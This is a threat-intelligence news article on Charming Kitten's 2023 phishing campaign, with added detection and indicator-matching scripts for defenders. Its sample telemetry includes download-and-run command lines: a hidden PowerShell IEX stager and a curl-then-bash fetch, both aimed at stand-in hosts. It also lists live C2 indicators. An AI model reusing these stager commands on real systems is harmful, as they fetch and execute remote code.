Sunday, March 3, 2024

Charming Kitten Hackers Use Weaponized MS Word Doc to Deploy PowerShell Backdoor

Charming Kitten, also known as TA453, is an Iranian government-backed cyberwarfare group that has conducted several attacks since 2017.

In mid-May 2023, these threat actors sent a benign email posing as a Senior Fellow of the Royal United Services Institute (RUSI), asking for feedback on a project called “Iran in the Global Security Context.”

The email also named other nuclear security experts whom the threat actors had contacted, to make the approach look credible to the victims. The email accounts used in this campaign were found to have been created by the attackers rather than compromised.

Charming Kitten – Overview of their TTPs

After the initial email, the threat actors sent their targets a Google Script macro that redirected the victims to a Dropbox URL hosting a password-protected .rar file (Abraham Accords & MENA.rar) and a .LNK file (Abraham Accords & MENA.pdf.lnk).

Full infection chain (Source: Proofpoint)

Dropper and Additional Malware

The .LNK file (Abraham Accords & MENA.pdf.lnk) acts as the dropper: it uses the Gorjol function and executes several PowerShell commands to establish a connection to the C2 server. Once the connection is established, it downloads a base64-encoded .txt file (the first Borjol function) from the server.

Once this first Borjol function is decoded, it communicates with the C2 at fuschia-rhinestone.cleverapps[.]io to download another encrypted Borjol function (the second Borjol function), which uses the same variables as the first.

This second Borjol function decrypts the PowerShell backdoor (GorjolEcho), which the threat actors use to gain persistence on the system. The backdoor opens a decoy PDF before exfiltrating data to the C2.

Mac Malware

According to Proofpoint's research, the malware did not run on Apple computers. However, a week after the initial communication, the threat actors sent a new infection chain that could also target macOS.

This time they sent malware disguised as a RUSI VPN solution, which runs an AppleScript file and uses the curl command to download the next stage from the C2 (library-store[.]camdvr[.]org/DMPR/[alphanumeric string]), which resolves to 144.217.129[.]176, an OVH IP address.

Instead of a PowerShell backdoor, a bash script (NokNok) was used this time to gain persistence on the system.

Mac system infection chain
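Both chains described above leave the same kind of trace in process telemetry: on Windows, a shortcut opened from Explorer spawns PowerShell with a command line that downloads something and base64-decodes it; on macOS, AppleScript (osascript) drives a shell or curl fetch of a URL. The following detection logic is an added example written for this article, not code from Proofpoint or from the malware. The event schema (ProcEvent), the rule names and the sample events (hosts ws01/ws02/mac01/mac02 and the example.invalid URLs) are constructed for illustration; only the behaviours the rules look for come from the article.

```python
import re
from dataclasses import dataclass
from ntpath import basename  # splits on both "\" and "/", so Windows and macOS paths both work


@dataclass
class ProcEvent:
    """A process-creation record (Sysmon Event ID 1 / EDR style). Field names are this example's own."""
    host: str
    parent_image: str
    image: str
    cmdline: str


# PowerShell download primitives and base64 decoding: the two ingredients of the
# LNK -> PowerShell -> base64 .txt stager chain described in the article.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient",
    re.I)
BASE64_RE = re.compile(r"FromBase64String|\s-e(c|nc|ncodedcommand)?\s", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.I)


def classify(ev: ProcEvent) -> list:
    """Return the names of the rules this event matches (empty list if none)."""
    hits = []
    img = basename(ev.image).lower()
    parent = basename(ev.parent_image).lower()
    cmd = ev.cmdline

    # Rule 1: PowerShell launched from Explorer (a double-clicked shortcut) whose command
    # line both fetches remote content and base64-decodes it.
    if (img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
            and DOWNLOAD_RE.search(cmd) and BASE64_RE.search(cmd)):
        hits.append("lnk_powershell_stager")

    # Rule 2: AppleScript driving a shell or curl process that reaches out to a URL,
    # the shape of the macOS "VPN solution" chain that pulls its next stage with curl.
    if parent == "osascript" and img in {"curl", "sh", "bash", "zsh"} and URL_RE.search(cmd):
        hits.append("macos_applescript_curl")
    return hits


def scan(events) -> list:
    """Run every event through the rules; return (host, rule, [urls]) per hit for triage."""
    results = []
    for ev in events:
        for rule in classify(ev):
            results.append((ev.host, rule, URL_RE.findall(ev.cmdline)))
    return results


# Constructed sample telemetry: one benign PowerShell launch, one stager-like launch,
# one osascript-driven curl fetch, and one ordinary curl run from an interactive shell.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\a\\Documents"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -nop -c "$u=\'https://stage.example.invalid/f.txt\';'
              '$d=(New-Object Net.WebClient).DownloadString($u);'
              'IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))"'),
    ProcEvent("mac01", "/usr/bin/osascript", "/bin/sh",
              "sh -c curl -s https://c2.example.invalid/DMPR/abc123 -o /tmp/.n && bash /tmp/.n"),
    ProcEvent("mac02", "/bin/bash", "/usr/bin/curl",
              "curl -s https://updates.example.invalid/pkg.tgz -o pkg.tgz"),
]


if __name__ == "__main__":
    for host, rule, urls in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule} urls={urls}")
```

Rule 1 deliberately requires both a download primitive and a base64 decode in the same command line, which keeps ordinary administrative PowerShell (the ws01 event) quiet while still catching the stager shape regardless of which C2 hostname is used; the extracted URLs give the responder the next pivot without needing the indicator list.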

Indicators of Compromise

SHA256 file hashes:
464c5cd7dd4f32a0893b9fff412b52165855a94d193c08b114858430c26a9f1d
ddead6e794b72af26d23065c463838c385a8fdfffb1b8940cd2c23c3569e43b1
fb7f1bf97b72379494ea140c42d6ddd53f0a78ce22e9192cfba3bae58251dade
98afa8550f81196e456c0cd4397120469212e190027e33a1131f602892b5f795
dc7e84813f0dae2e72508d178aed241f8508796e59e33da63bd6b481f507026b
6916b5980e79a2d20b4c433ad8e5e34fe9683ee61a42b0730effc6f056191eba
cfa8a5306b702d610620a07040262538dd59820d5a42cf01fd9094ce5cc3487c

Network indicators (defanged):
library-store[.]camdvr[.]org
144.217.129[.]176
filemanager.theworkpc[.]com
fuschia-rhinestone.cleverapps[.]io
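Indicator lists like the one above are published defanged ("[.]" instead of "."), so before they can be compared with DNS or file-hash telemetry they have to be refanged and sorted by type. The script below is an added example written for this article (not Proofpoint's or the publisher's code): it embeds the article's indicators, refangs them, and checks them against constructed sample data. The DNS log format, the hosts ws02/mac01, the resolved addresses other than the OVH IP, and the file paths and the second file hash are all made up for illustration.

```python
import re

# The article's indicator list, as published (defanged), one entry per line.
RAW_IOCS = """
464c5cd7dd4f32a0893b9fff412b52165855a94d193c08b114858430c26a9f1d
ddead6e794b72af26d23065c463838c385a8fdfffb1b8940cd2c23c3569e43b1
fb7f1bf97b72379494ea140c42d6ddd53f0a78ce22e9192cfba3bae58251dade
98afa8550f81196e456c0cd4397120469212e190027e33a1131f602892b5f795
dc7e84813f0dae2e72508d178aed241f8508796e59e33da63bd6b481f507026b
6916b5980e79a2d20b4c433ad8e5e34fe9683ee61a42b0730effc6f056191eba
cfa8a5306b702d610620a07040262538dd59820d5a42cf01fd9094ce5cc3487c
library-store[.]camdvr[.]org
144.217.129[.]176
filemanager.theworkpc[.]com
fuschia-rhinestone.cleverapps[.]io
"""

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def refang(value: str) -> str:
    """Turn a defanged indicator back into its live form so it can be compared with logs."""
    v = value.strip()
    for defanged, live in (("[.]", "."), ("(.)", "."), ("[dot]", "."), ("hxxp", "http")):
        v = v.replace(defanged, live)
    return v.lower()


def parse_iocs(text: str) -> dict:
    """Sort indicators into hashes, IPv4 addresses and domains (anything else is treated as a domain)."""
    iocs = {"sha256": set(), "ipv4": set(), "domain": set()}
    for line in text.splitlines():
        v = refang(line)
        if not v:
            continue
        if SHA256_RE.match(v):
            iocs["sha256"].add(v)
        elif IPV4_RE.match(v):
            iocs["ipv4"].add(v)
        else:
            iocs["domain"].add(v)
    return iocs


def domain_matches(qname: str, domains) -> bool:
    """Exact or subdomain match, so a lookup of x.c2.example also hits an indicator of c2.example."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def match_dns_log(lines, iocs: dict) -> list:
    """Constructed log format: '<timestamp> <host> query <qname> -> <answer>'. Returns (host, qname, answer) hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6 or parts[2] != "query":
            continue
        _ts, host, _, qname, _, answer = parts[:6]
        if domain_matches(qname, iocs["domain"]) or answer in iocs["ipv4"]:
            hits.append((host, qname, answer))
    return hits


def match_hashes(file_hashes: dict, iocs: dict) -> list:
    """Return the paths whose SHA256 appears in the indicator set."""
    return sorted(path for path, digest in file_hashes.items() if digest.lower() in iocs["sha256"])


# Constructed sample telemetry (the second hash below is the SHA256 of an empty file).
SAMPLE_DNS = [
    "2024-03-01T09:12:03Z ws02 query fuschia-rhinestone.cleverapps.io -> 203.0.113.10",
    "2024-03-01T09:15:44Z ws02 query www.example.com -> 93.184.216.34",
    "2024-03-01T10:02:19Z mac01 query library-store.camdvr.org -> 144.217.129.176",
    "2024-03-01T10:05:00Z mac01 query cdn.example.net -> 198.51.100.7",
]
SAMPLE_FILE_HASHES = {
    r"C:\Users\a\Downloads\sample.rar": "464c5cd7dd4f32a0893b9fff412b52165855a94d193c08b114858430c26a9f1d",
    r"C:\Users\a\Documents\report.docx": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

if __name__ == "__main__":
    iocs = parse_iocs(RAW_IOCS)
    print("DNS hits:", match_dns_log(SAMPLE_DNS, iocs))
    print("Hash hits:", match_hashes(SAMPLE_FILE_HASHES, iocs))
```

The subdomain match in domain_matches matters for this campaign in particular: the macOS stage was fetched from a path under library-store[.]camdvr[.]org, so a resolver log may show that host or a label beneath it, and an exact-string comparison would miss the latter.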

A complete detailed analysis of this threat group has been published by Proofpoint.


The post Charming Kitten Hackers Uses Weaponized MS Word Doc to Deploy Powershell Backdoor appeared first on Cyber Security News.
